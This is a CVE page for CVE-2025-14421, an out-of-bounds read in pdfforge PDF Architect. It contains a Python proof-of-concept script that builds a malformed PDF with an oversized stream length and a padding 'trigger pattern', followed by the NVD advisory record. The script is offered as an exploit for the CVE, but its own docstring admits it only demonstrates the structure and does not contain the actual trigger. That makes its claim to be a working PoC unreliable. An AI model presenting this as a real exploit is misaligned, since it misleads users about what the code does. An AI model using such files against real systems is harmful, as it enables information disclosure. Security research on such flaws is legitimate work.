CVE-2025-14421

''' CVE-2025-14421 PoC - Malformed PDF Triggering Out-of-Bounds Read Note: This PoC is for educational and security testing purposes only. Use only in authorized testing environments with proper permissions. ''' from malduck import p32, p64 import struct def create_malformed_pdf(): ''' Create a minimal malformed PDF to trigger OOB read in PDF Architect This PoC demonstrates the structure but actual trigger requires specific object positioning and stream data manipulation ''' # PDF Header pdf_content = b'%PDF-1.7\n' pdf_content += b'%\xe2\xe3\xcf\xd3\n' # Object 1: Catalog (minimal) obj1_offset = len(pdf_content) pdf_content += b'1 0 obj\n' pdf_content += b'<< /Type /Catalog /Pages 2 0 R >>\n' pdf_content += b'endobj\n\n' # Object 2: Pages with potential OOB trigger obj2_offset = len(pdf_content) pdf_content += b'2 0 obj\n' pdf_content += b'<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n' pdf_content += b'endobj\n\n' # Object 3: Page with crafted stream data obj3_offset = len(pdf_content) stream_data = b'\x00' * 100 # Padding data stream_data += b'\xFF\xFF\xFF\xFF' # Potential OOB trigger pattern pdf_content += b'3 0 obj\n' pdf_content += b'<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\n' pdf_content += b'endobj\n\n' # Object 4: Stream object with crafted Length obj4_offset = len(pdf_content) pdf_content += b'4 0 obj\n' pdf_content += b'<< /Length ' + str(len(stream_data) + 100).encode() + b' >>\n' pdf_content += b'stream\n' pdf_content += stream_data pdf_content += b'\nendstream\n' pdf_content += b'endobj\n\n' # Cross-reference table xref_offset = len(pdf_content) pdf_content += b'xref\n' pdf_content += b'0 5\n' pdf_content += b'0000000000 65535 f \n' pdf_content += f'{obj1_offset:010d} 00000 n \n'.encode() pdf_content += f'{obj2_offset:010d} 00000 n \n'.encode() pdf_content += f'{obj3_offset:010d} 00000 n \n'.encode() pdf_content += f'{obj4_offset:010d} 00000 n \n'.encode() # Trailer pdf_content += b'trailer\n' pdf_content += b'<< /Size 5 /Root 1 0 R >>\n' pdf_content += b'startxref\n' pdf_content += str(xref_offset).encode() + b'\n' pdf_content += b'%%EOF\n' return pdf_content def main(): print('[+] Generating CVE-2025-14421 PoC PDF') pdf_data = create_malformed_pdf() output_file = 'CVE-2025-14421_poc.pdf' with open(output_file, 'wb') as f: f.write(pdf_data) print(f'[+] PoC PDF saved to: {output_file}') print('[+] Size:', len(pdf_data), 'bytes') print('[!] Warning: Use only in authorized testing environments') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-14421", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:49.160", "lastModified": "2026-01-02T21:49:20.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pdfforge PDF Architect PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27915."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABF2DE43-AF21-4EFD-917E-1E57E0E1FF15"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1078/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}